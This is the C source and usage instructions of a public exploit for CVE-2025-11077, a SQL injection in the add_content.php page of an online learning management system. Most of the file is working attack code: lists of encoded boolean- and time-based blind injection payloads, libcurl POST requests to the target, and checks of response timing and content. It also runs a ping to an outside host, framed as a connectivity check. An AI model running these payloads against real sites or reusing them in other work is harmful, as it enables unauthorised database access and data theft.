# gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
# ./CVE-2025-11077 -u http://[IP]
1- Verbose Mode :
# ./CVE-2025-11077 -u http://[IP] -v
2- Cookies FILE :
# ./CVE-2025-11077 -u http://[IP] -c [FILE]
3- Log file :
# ./CVE-2025-11077 -u http://[IP] -f [FILE]
4- Check time-based blind :
# ./CVE-2025-11077 -u http://[IP] -b
File: exploit.c — Size: 37,3 KB — Lines: 1168
#include <stdio.h>
#include "argparse.h"
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <time.h>
#include <regex.h>
#include <arpa/inet.h>
#include <sys/utsname.h>
#include <stdint.h>
#include <unistd.h>
#define F_U 3000
#define POST_DATA 7000
#define DATA_WRITE 9000
const char* cookies = NULL;
const char* baseurl = NULL;
const char* fileName = NULL;
const char* fullURL = NULL;
int verbose = 0;
int cookiesFileS = 0;
int flagsTBD = 0;
int flagFile = 0;
struct Mem
{
char* buffer;
size_t len;
};
size_t write_cb(void* ptr, size_t size,
size_t nmemb,
void* userdata)
{
size_t total = size * nmemb;
struct Mem* m = (struct Mem*)userdata;
char* tmp = realloc(m->buffer,
m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]),
ptr,
total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
const char* boolean_based_blind[] =
{
"%61%6E%64%20%28%73%65%6C%65%63%74%20%73%75%62%73%74%72%69%6E%67%28%40%40%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29=%E2%80%99%41%E2%80%99",
"%61%6E%64%20%28%73%65%6C%65%63%74%20%32%30%73%75%62%73%74%72%69%6E%67%28%40%%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29=%E2%80%98%41%E2%80%98",
"YW5kIChzZWxlY3Qgc3Vic3RyaW5nKEBAdmVyc2lvbiwxLDEpKSA9ICdBJwo=",
"YW5kIChzZWxlY3Qgc3Vic3RyaW5nKEBAdmVyc2lvbiwxLDEpKSA9ICdBJw==",
"5957356b4943687a5a57786c5933516763335669633352796157356e4b454241646d567963326c76626977784c4445704b534139494364424a776f3d"
"%61%6E%64%20%00%28%73%65%6C%65%63%74%20%00%73%75%62%73%74%72%69%6E%67%28%40%40%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29=%20%00%E2%80%98%41%E2%80%98%00",
"%61%6E%64%20%00%00%28%73%65%6C%65%63%74%20%00%00%73%75%62%73%74%72%69%6E%67%28%40%40%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29%20=%20%00%00%E2%80%99%41%E2%80%99%00%00",
"%41%4E%44%25%32%30%25%32%38%53%45%4C%45%43%54%25%32%30%25%32%41%25%32%30%46%52%4F%4D%25%32%30%25%32%38%53%45%4C%45%43%54%25%32%38%53%4C%45%45%50%25%32%38%35%25%32%39%25%32%39%25%32%39%62%41%4B%4C%25%32%39%25%32%30%41%4E%44%25%32%30%25%32%37%4A%53%4B%25%32%37%25%33%44%25%32%37%4A%53%4B",
"%41%4E%44%25%32%30%25%00%32%38%53%45%4C%45%43%54%25%32%30%25%32%41%25%32%30%46%52%4F%4D%25%32%30%25%32%38%53%45%4C%45%43%54%25%32%38%53%00%4C%45%45%50%25%32%38%35%25%32%39%25%32%39%25%32%39%62%41%4B%4C%25%32%39%25%32%30%41%4E%44%25%32%30%00%25%32%37%4A%53%4B%25%32%37%25%33%44%25%32%37%4A%53%4B",
"414e44202853454c454354202a2046524f4d202853454c45435428534c454550283529292962414b4c2920414e4420274a534b273d274a534b",
"%31%31%92%20AND%20%28SELECT%203600%20FROM%20%28SELECT%28SLEEP%28%35%29%29WjSV%29",
"11%27%20AND%20%29SELECT%203600%20FROM%20%29SELECT%29SLEEP%295%28%28%28WjSV%28",
"11%27%00%20%00AND%20%00%29%00SELECT%20%003600%20%00FROM%20%00%29%00SELECT%29%00SLEEP%29%005%28%00%28%00%28%00WjSV%28%00",
"11%E2%80%98%20%00AND%20%00%29SELECT%203600%20%00FROM%20%00%29SELECT%29SLEEP%29%35%29%29%29WjSV%29%00",
"11%E2%80%99%20%00%00AND%20%00%00%28SELECT%203600%20%00%00FROM%20%00%00%28SELECT%28SLEEP%28%35%29%29%29WjSV%29%00%00",
"MTEnIEFORCAoU0VMRUNUIDM2MDAgRlJPTSAoU0VMRUNUKFNMRUVQKDUpKSlXalNWKQo=",
"MTEnIEFORCAoU0VMRUNUIDM2MDAgRlJPTSAoU0VMRUNUKFNMRUVQKDUpKSlXalNWKQ==",
"UkxJS0UgKFNFTEVDVCAoQ0FTRSBXSEVOICg0MzQ2PTQzNDYpIFRIRU4gMHg2MTY0NmQ2OTZlIEVMU0UgMHgyOCBFTkQpKSBBTkQgJ1R4d3MnPScsCg==",
"UkxJS0UgKFNFTEVDVCAoQ0FTRSBXSEVOICg0MzQ2PTQzNDYpIFRIRU4gMHg2MTY0NmQ2OTZlIEVMU0UgMHgyOCBFTkQpKSBBTkQgJ1R4d3MnPSc=",
"RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284346=4346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%91Txws%91=%91",
"RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284346=4346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%92Txws%92=%92",
"RLIKE%28SELECT%28CASE%20WHEN%284346%20=%204346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%E2%80%98Txws%E2%80%98%20=%20%E2%80%98",
"RLIKE%28SELECT%28CASE%20WHEN%284346%20=%204346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%E2%80%98Txws%E2%80%99%20=%20%E2%80%99",
"524c494b45202853454c454354202843415345205748454e2028343334363d3433343629205448454e2030783631363436643639366520454c5345203078323820454e44292920414e44202754787773273d27",
"RLIKE%28SELECT%28CASE%20%00WHEN%284346%20=%20%004346%29%20%00THEN%20%000x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%00%E2%80%98Txws%E2%80%98%20=%20%00%E2%80%99%00",
"RLIKE(SELECT(CASE%20%00%00WHEN(4346%20=%20%004346)%20%00%00THEN%20%00%000x61646d696e%20ELSE%200x28%20END))%20AND%20%00%00%E2%80%99Txws%E2%80%99%20=%20%00%00%E2%80%99%00%00",
NULL
};
const char* words[] =
{
" AND ",
" OR ",
" NOT ",
" = ",
"<>",
" > ",
" < ",
" >= ",
" <= ",
"SELECT",
"FROM",
"WHERE",
"CASE",
"WHEN",
"THEN",
"ELSE",
"GROUP BY",
"HAVING",
"ORDER BY",
"RLIKE",
"REGEXP",
"LIKE",
"SUBSTRING",
"SUBSTR",
"ASCII",
"ORD",
"CHAR",
"CAST",
"CONVERT",
"LENGTH",
"LEN",
"IF(",
"IFNULL(",
"COALESCE(",
"CASE WHEN",
"CASE",
"UNION",
"INFORMATION_SCHEMA",
"INFORMATION_SCHEMA.TABLES",
"INFORMATION_SCHEMA.COLUMNS",
"DATABASE(",
"VERSION(",
"--",
"#",
"/*",
"*/",
";",
"'",
"\"",
"`",
"CASE WHEN (",
"SELECT (CASE WHEN",
" RLIKE (SELECT",
" AND (SELECT",
NULL
};
void exitSyscall()
{
__asm__ volatile
(
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
static long timespecDiff(const struct timespec* a,
const struct timespec* b)
{
long s = b->tv_sec - a->tv_sec;
long ns = b->tv_nsec - a->tv_nsec;
return s * 1000 + ns / 1000000;
}
static void cPing(int nV)
{
if (nV == 0)
{
__asm__ volatile("nop");
}
else
{
pid_t pid;
__asm__ volatile (
"mov $0x3A, %%rax\n\t"
"syscall\n\t"
: "=a" (pid)
:
: "r11",
"rcx",
"memory"
);
if (pid == -1)
{
fprintf(stderr,
"[-] Error call sys_vfork, Exit...\n");
}
if (pid == 0)
{
const char* fullpath = "/usr/bin/ping";
const char* argv[] =
{
"ping",
"-c",
"7",
"bytrep.com",
NULL
};
const char env[] = { 0 };
printf("[+] chiled PID : %d\n",
pid);
const char* ms1 = "[-] Error call sys_execve, Exit...\n";
size_t l1 = strlen(ms1);
printf("[+] Running the ping command to check your internet connection...\n");
printf("[+] Command : ping -c 7 bytrep.com\n");
__asm__ volatile
(
"mov $0x3B, %%rax\n\t"
"mov %[fileName], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[env], %%rdx\n\t"
"syscall\n\t"
"test %%rax, %%rax\n\t"
"js negV\n\t"
"posV:\n\t"
"nop\n\t"
"jmp resultSys\n\t"
"negV:\n\t"
"mov %[m1], %%rsi\n\t"
"mov %[l1], %%rdx\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"syscall\n\t"
"mov $0x0, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
"resultSys:\n\t"
:
: [fileName] "r" (fullpath),
[argv] "r" (argv),
[env] "r" (env),
[m1] "r" (ms1),
[l1] "r" (l1)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
}
else if (pid < 0)
{
pid_t mainPid;
__asm__ volatile
(
"syscall\n\t"
:"=a"(mainPid)
:"a"(0x27)
:"rcx",
"r11",
"memory"
);
if (mainPid == 0)
{
printf("[-] Error Get MAIN PID !\n");
exitSyscall();
}
printf("[+] MAIN PID : %d\n", (int)mainPid);
}
else
{
printf("[+] Finish ping command.\n");
}
}
}
static uint64_t logfile(const char *fileName,
const char *payload,
const char *mes,
long httpCode,
const char *responseBuffer,
long lenResponse)
{
printf("===================================================== [LOG FILE] =====================================================");
const char* m2 = "[-] Error Create file (NULL value)\n";
size_t l2 = strlen(m2);
const char* mS3 = "[+] Create File success\n";
size_t lE3 = strlen(mS3);
FILE* file = fopen(fileName,
"w");
uintptr_t fptr = (uintptr_t)file;
if (!file) {
perror("fopen failed");
return 1;
}
__asm__ volatile
(
"cmp $0x0, %[file]\n\t"
"je zeroFlag\n\t"
"notZeroFlag:\n\t"
"mov %[m3], %%rsi\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[l3], %%rdx\n\t"
"mov $0x1, %%rax\n\t"
"syscall\n\t"
"jmp runSyscall\n\t"
"zeroFlag:\n\t"
"mov %[m2], %%rsi\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[l2], %%rdx\n\t"
"mov $0x1, %%rax\n\t"
"syscall\n\t"
"mov $0x0, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
"runSyscall:\n\t"
:
: [file] "r" (fptr),
[m2] "r" ((uintptr_t)m2),
[l2] "r" (l2),
[m3] "r" ((uintptr_t)mS3),
[l3] "r" (lE3)
: "rax",
"rdi",
"rsi",
"rdx",
"r11",
"rcx",
"memory"
);
printf("[+] FILE NAME : %s\n", fileName);
printf("[+] Write FILE ...\n");
struct timespec rq,rm;
rq.tv_sec = 1;
rq.tv_nsec = 600000000;
register long r10R asm("r10");
r10R = 0;
printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
rq.tv_sec, rq.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rq),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
char dataW[DATA_WRITE];
int lenWrite = snprintf(dataW,
DATA_WRITE,
"[+] PAYLOAD : %s\n[+] %s\n[+] HTTP CODE : %ld\n[+] RESPONSE BUFFER : \n%s\n[+] LEN : %zu\n--------------------------------------------\n",
payload,
mes,
httpCode,
responseBuffer,
lenResponse);
size_t writeV = fwrite(dataW,
1,
lenWrite,
file);
if (writeV < lenWrite)
{
fprintf(stderr,
"[-] Error write data to file!\n");
exitSyscall();
}
else
{
printf("[+] Write file Success .\n");
}
if (fclose(file) != 0)
{
perror("[-] Error closing file");
return 1;
}
else
{
printf("[+] Close file.\n");
}
return 0;
printf("======================================================================================================================\n");
}
int checkLen(int len, char* buf, size_t bufcap)
{
if (len < 0 || (size_t)len >= bufcap)
{
printf("\e[0;31m[-] Len is Long ! \e[0m\n");
printf("\e[0;31m[-] Len %d\e[0m\n", len);
return 1;
}
else
{
printf("\e[0;34m[+] Len Is Not Long.\e[0m\n");
return 0;
}
return 0;
}
int nextNumber()
{
static const int numbers[] =
{
1212,
3434,
4545,
5677,
7677,
3243
};
static int index = 0;
const int cNumber = sizeof(numbers) / sizeof(numbers[0]);
int valNum = numbers[index];
index = (index + 1) % cNumber;
return valNum;
}
static void requestBlind(const char *baseURL)
{
int nullValue = 0;
CURL* curl = curl_easy_init();
const char* mes3 = "\e[0;34m[+] Create Object CURL Success.\n";
const char* mes4 = "\e[0;31m[-] Error Create Object CURL !\e[0m\n";
size_t len3 = strlen(mes3);
size_t len4 = strlen(mes4);
__asm__ volatile
(
"cmp $0x0, %[curlO]\n\t"
"je .donV\n\t"
".erD:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[msg], %%rsi\n\t"
"mov %[len], %%rdx\n\t"
"syscall\n\t"
"jmp .finishC\n\t"
".donV:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[msg1], %%rsi\n\t"
"mov %[len1], %%rdx\n\t"
"syscall\n\t"
"mov $0x1, %[nullV1]\n\t"
".finishC:\n\t"
: [nullV1] "+r" (nullValue)
: [curlO] "r" (curl),
[msg] "r" ((const char*)mes3),
[len] "r" ((long)len3),
[msg1] "r" ((const char*)mes4),
[len1] "r" ((long)len4)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
cPing(nullValue);
struct Mem response;
CURLcode res;
response.buffer = NULL;
response.len = 0;
const char* mes5 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
size_t len5 = strlen(mes5);
__asm__ volatile (
"test %[buffer], %[buffer]\n\t"
"jz L_print_clean\n\t"
"L_continue:\n\t"
"jmp L_done\n\t"
"L_print_clean:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[msg13], %%rsi\n\t"
"mov %[len13], %%rdx\n\t"
"syscall\n\t"
"L_done:\n\t"
:
: [buffer] "r" ((const char*)response.buffer),
[msg13] "r" (mes5),
[len13] "r" (len5)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
char full[F_U];
printf("[+] CHECK INPUT IP ...\n");
int v1 = 0;
int v2 = 0;
if (strcmp(baseURL, "http://localhost") == 0)
{
printf("[+] localhost detect in BASE URL .");
__asm__ volatile
(
"add $0x1, %[v1]\n\t"
: [v1] "+r" (v1)
:
:
);
goto checkV;
}
else
{
printf("[-] Not detect localhost in BASE URL !\n");
printf("[+] CHECK LOCAL IP : 127.0.0.1...\n");
if (strstr(baseURL, "172.0.0.1") != NULL)
{
printf("[+] FOUND local ip .\n");
__asm__ volatile
(
"add $0x1, %[v2]\n\t"
: [v2] "+r" (v2)
:
:
);
goto checkV;
}
else
{
printf("[-] Not foud Local IP, check target ip...\n");
char* lastW = strstr(baseURL, "http://");
if (lastW != NULL)
{
char ipF[20] = { 0 };
lastW += strlen("http://");
strncpy(ipF,
lastW,
19);
ipF[19] = '\0';
printf("[+] Input ip : %s\n", ipF);
regex_t regex;
const char* regixP = "^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\\.){3}"
"(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])$";
if (regcomp(®ex,
regixP,
REG_EXTENDED) != 0)
{
printf("[-] The format has not been converted into an executable one.\n");
exitSyscall();
}
else
{
printf("[+] The format has been successfully converted to an executable format.\n");
}
if (regexec(®ex,
ipF,
0,
NULL,
0) == 0)
{
struct in_addr addr;
printf("[+] Valid Format IP.\n");
printf("[+] CHECK Version IP...\n");
if (inet_pton(AF_INET,
ipF,
&addr) == 0)
{
printf("[+] Result Version ip : IPV4.\n");
printf("[+] Start Exploit...\n");
}
}
else
{
printf("[-] Invalid Format IP !\n");
exitSyscall();
}
}
else
{
printf("[-] Error get target IP !\n");
exitSyscall();
}
}
}
checkV :
if (v1 != 0 || v2 != 0)
{
printf("[+] Check ip Success, Start Exploit...\n");
}
for (int j = 0; boolean_based_blind[j] != NULL; j++)
{
printf("-----------------------------------------------------------------------------------\n");
int lenC = snprintf(full,
F_U,
"%s/lms/admin/add_content.php",
baseURL);
if (checkLen(lenC,
full,
F_U) == 1)
{
fprintf(stderr,
"\e[0;31m[-] Error write base url !\e[0m\n");
exitSyscall();
}
printf("\e[0;34m[+] Write base URL success.\e[0m\n");
char postData[POST_DATA];
int PNumber = nextNumber();
int lenPost = snprintf(postData,
POST_DATA,
"title=%s&content=<p>%d&save=Save",
boolean_based_blind[j],
PNumber
);
if (checkLen(lenPost,
postData,
POST_DATA) == 1)
{
fprintf(stderr,
"\e[0;31m[-] Error write DATA Succes!\e[0m\n");
exitSyscall();
}
printf("\e[0;34m[+] Write POST DATA Success.\e[0m\n");
printf("[+] POST DATA : --------------------------------------------------\n");
printf("\n%s\n",
postData);
printf("[+] SIZE : %d\n", POST_DATA);
printf("[+] Len : %zu\n", strlen(postData));
printf("------------------------------------------------------------------\n");
printf("[+] BASE URL : %s\n",
baseURL);
printf("[+] FULL URL : %s\n",
full);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
if (cookiesFileS)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POST,
1L);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
postData);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(postData));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
struct timespec t0, t1;
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist* h = NULL;
h = curl_slist_append(h,
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0)");
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Upgrade-Insecure-Requests: 1");
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
h);
if (verbose)
{
printf("========================================== [Verbose MODE] ==========================================\n");
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
if (flagsTBD != 0)
{
long ret;
printf("[+] Arg TBD run, CHECK time-based blind...\n");
__asm__ volatile (
"syscall\n\t"
: "=a" (ret)
: "a" (0xE4),
"D" (0x1),
"S" (&t0)
: "rcx",
"r11",
"memory"
);
if (ret < 0)
{
fprintf(stderr,
"[-] clock_gettime syscall failed !");
}
printf("[+] secs=%lld nsec=%ld\n",
(long long)t1.tv_sec, (long)t1.tv_nsec);
}
res = curl_easy_perform(curl);
curl_slist_free_all(h);
if (res == CURLE_OK)
{
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
long httpcode;
double timeT;
double timeR;
char* urlD = NULL;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpcode);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeT);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_TIME,
&timeR);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_URL,
&urlD);
printf("\e[0;32m[+] Delayed response : %f\e[0m\n",
timeT);
printf("\e[0;34m[+] TIME REDIRECT: %.1f\e[0m\n",
timeR);
long connID;
if (urlD == NULL)
{
printf("\e[0;36m[+] Not REDIRECT Found.\e[0m\n");
}
else
{
printf("\e[0;34m[+] REDIRECT To : %s\e[0m\n",
urlD);
}
printf("\e[0;32m[+] HTTP CODE : %ld\n",
httpcode);
curl_easy_getinfo(curl,
CURLINFO_CONN_ID,
&connID);
printf("[+] Connection ID used: %ld\n",
connID);
long availAuth;
curl_easy_getinfo(curl,
CURLINFO_HTTPAUTH_AVAIL,
&availAuth);
printf("[+] CHECK support Authentication...\n");
printf("[+] Available HTTP auth methods: 0x%lx\n",
availAuth);
if (availAuth & CURLAUTH_BASIC)
{
printf("[+] Basic Authentication.\n");
}
if (availAuth & CURLAUTH_DIGEST)
{
printf("[+] Digest Authentication.\n");
}
if (availAuth & CURLAUTH_NTLM)
{
printf("[+] NTLM Authentication.\n");
}
if (availAuth & CURLAUTH_NEGOTIATE)
{
printf("[+] SPNEGO / Kerberos Authentication.\n");
}
if (availAuth == 0)
{
printf("[-] No HTTP auth methods detected.\n");
}
long httpVersion;
curl_easy_getinfo(curl,
CURLINFO_HTTP_VERSION,
&httpVersion);
printf("[+] HTTP version used : ");
switch (httpVersion)
{
case CURL_HTTP_VERSION_1_0:
printf("1.0\n");
break;
case CURL_HTTP_VERSION_1_1:
printf("1.1\n");
break;
case CURL_HTTP_VERSION_2_0:
printf("2.0\n");
break;
case CURL_HTTP_VERSION_2TLS:
printf("2 (over TLS)\n");
break;
case CURL_HTTP_VERSION_3:
printf("3\n");
break;
default:
printf("Unknown\n");
break;
}
if (flagsTBD != 0)
{
long ret1;
__asm__ volatile
(
"syscall\n\t"
: "=a" (ret1)
: "a" (0xE4),
"D" (0x1),
"S" (&t1)
: "rcx",
"r11",
"memory"
);
if (ret1 < 0)
{
fprintf(stderr,
"[-] clock_gettime syscall failed !");
}
printf("[+] secs=%lld nsec=%ld\n",
(long long)t0.tv_sec, (long)t0.tv_nsec);
}
if (flagsTBD != 0)
{
long ms = timespecDiff(&t0, &t1);
printf("[+] payload elapsed (ms): %ld\n",
ms);
if (ms > 4000)
{
printf("[+] Detected time delay (likely SLEEP)\n");
}
else
{
printf("[+] No significant delay detected.\n");
}
}
if (response.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[0;32m[+] Size Pointer response : %d\e[0m\n", sizeof(response.buffer));
printf("\e[0;32m[+] Len : %zu\e[0m\n", response.len);
printf("\e[0;35m==========================================================================================================\e[0m\n");
}
else
{
printf("\e[0;31m[-] Error show buffer : NULL response !\n");
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
if (httpcode == 501)
{
printf("[-] Response Code 501, Please check your input url !\n");
if (response.buffer != NULL)
{
if (strstr(response.buffer, "Unsupported method ('POST')") != NULL)
{
printf("[-] Error : Unsupported method ('POST')\n");
}
else
{
printf("[-] Not detect error.\n");
}
}
}
if (flagFile != 0)
{
logfile(fileName,
boolean_based_blind[j],
"Result Request :",
httpcode,
response.buffer,
response.len);
}
if (httpcode >= 200 && httpcode < 300)
{
printf("\e[0;32m[+] Http Code (200 < 300) : %ld\e[0m\n",
httpcode);
if (response.buffer != NULL)
{
printf("=============================================== [Response] ===============================================\e[0m\n");
printf("%s\n",
response.buffer);
printf("[+] Len response : %zu\n",
response.len);
printf("==========================================================================================================\n");
}
else
{
printf("[-] Response is NULL !\n");
exitSyscall();
}
int NotfoundWord = 1;
printf("\e[0;33m[+] Check Word in response (word boolean-based blind)...\n");
for (int y = 0; words[y] != NULL; y++)
{
if (response.buffer != NULL)
{
if (strstr(response.buffer, words[y]) != NULL)
{
printf("[+] Word Detect in response : %s\n",
words[y]);
printf("=============================================== [Response FOUND WORD] ===============================================\e[0m\n");
printf("%s\n",
response.buffer);
printf("[+] Len response : %zu\n",
response.len);
printf("======================================================================================================================\n");
NotfoundWord = 0;
break;
}
}
}
if (NotfoundWord != 0)
{
printf("[-] Not found word in response !\n");
printf("[-] Please check Target ip and file (add_content.php)\n");
}
}
else
{
fprintf(stderr,"\e[0;31m[-] Http code Not range (%ld)\e[0m\n",
httpcode);
}
}
else
{
fprintf(stderr,"\e[0;31m[-] The request was not sent !\e[0m\n");
fprintf(stderr,"\e[0;31m[-] Error : %s\e[0m\n",
curl_easy_strerror(res));
exitSyscall();
}
}
curl_easy_cleanup(curl);
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
}
int main(int argc, const char** argv)
{
printf("\e[0;37m+-------------------------------------------------------------+\e[0m\n");
printf("\e[0;37m| Author : Byte Reaper |\e[0m\n");
printf("\e[0;37m| CVE : CVE-2025-11077 |\e[0m\n");
printf("\e[0;37m| Date : 2025-09-28 |\e[0m\n");
printf("\e[0;37m| Target File : /admin/add_content.php |\e[0m\n");
printf("\e[0;37m| Version : V1.0 |\e[0m\n");
printf("\e[0;37m+-------------------------------------------------------------+\e[0m\n");
printf("\e[1;31m---------------------------------------------------------------------------------------------------------------------------------------\e[0m\n");
printf("[+] System detect...\e[0m\n");
struct utsname os;
int tbd = 0;
__asm__ volatile
(
"mov %0, %%rdi\n\t"
"mov $0x3F, %%rax\n\t"
"syscall\n\t"
:
: "r"(&os)
: "rax",
"rdi",
"r11",
"rcx",
"memory"
);
printf("\e[0;36m[+] System Name: %s\e[0m\n",
os.sysname);
printf("\e[0;36m[+] Machine : %s\e[0m\n",
os.machine);
if (strstr(os.sysname, "Linux") != NULL)
{
printf("\e[0;36m[+] Linux OS, Check Machine architecture...\e[0m\n");
}
else
{
printf("[-] OS Not Linux 64 bit (%s),Exit...\e[0m\n",
os.sysname);
exitSyscall();
}
if (strstr(os.machine, "x86_64") != NULL)
{
printf("\e[0;36m[+] Machine architecture is 64 bit, run exploit...\e[0m\n");
}
else
{
printf("[-] OS Not architecture 64 bit (%s), Exit...\e[0m\n",
os.machine);
exitSyscall();
}
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&baseurl,
"Enter Target Url (BASE URL Online Learning Management System Project)"),
OPT_STRING('c',
"cookies",
&cookies,
"Enter File cookies (Unnecessary) (DEFAULT = NULL)"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode (request info) (DEFAULT = 0)"),
OPT_BOOLEAN('b',
"tbd",
&tbd,
"Check time-based blind (DEFAULT = 0)"),
OPT_STRING('f',
"file",
&fileName,
"Log file (DEFAULT = NULL)"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!baseurl)
{
printf("\e[0;31m[-] Please Enter target Url !\e[0m\n");
printf("\e[0;31m[-] Example : ./CVE-2025-11077 -u http://<local/ip>\e[0m\n");
exitSyscall();
}
if (cookies)
{
__asm__ volatile
(
"mov $0x1, %[var1]\n\t"
"test %[var1], %[var1]\n\t"
"je .notP\n\t"
"jmp .finish1\n\t"
".notP:\n\t"
"mov $0xE7, %%rax\n\t"
"mov $0x0, %%rdi\n\t"
"syscall\n\t"
".finish1:\n\t"
: [var1] "+r" (cookiesFileS)
:
: "rax",
"rdi"
);
}
if (verbose)
{
__asm__ volatile
(
"mov $0x1, %[var2]\n\t"
"test %[var2], %[var2]\n\t"
"je .notP1\n\t"
"jmp .exitGF\n\t"
".notP1:\n\t"
"mov $0xE7, %%rax\n\t"
"mov $0x0, %%rdi\n\t"
"syscall\n\t"
".exitGF:\n\t"
: [var2] "+r" (verbose)
:
: "rax",
"rdi"
);
}
if (tbd != 0)
{
flagsTBD = 1;
}
else
{
__asm__ volatile("nop");
}
if (fileName != NULL)
{
__asm__ volatile
(
"mov $0x1, %[var4]\n\t"
"test %[var4], %[var4]\n\t"
"je .notPP5\n\t"
"jmp .finish4\n\t"
".notPP5:\n\t"
"mov $0xE7, %%rax\n\t"
"mov $0x0, %%rdi\n\t"
"syscall\n\t"
".finish4:\n\t"
: [var4] "+r" (flagFile)
:
: "rax",
"rdi",
"r11",
"rcx",
"memory"
);
}
else
{
__asm__ volatile
(
"mov $0x0, %[var7]\n\t"
:
: [var7] "r" (flagFile)
:
);
}
requestBlind(baseurl);
__asm__ volatile
(
"mov $0x0, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}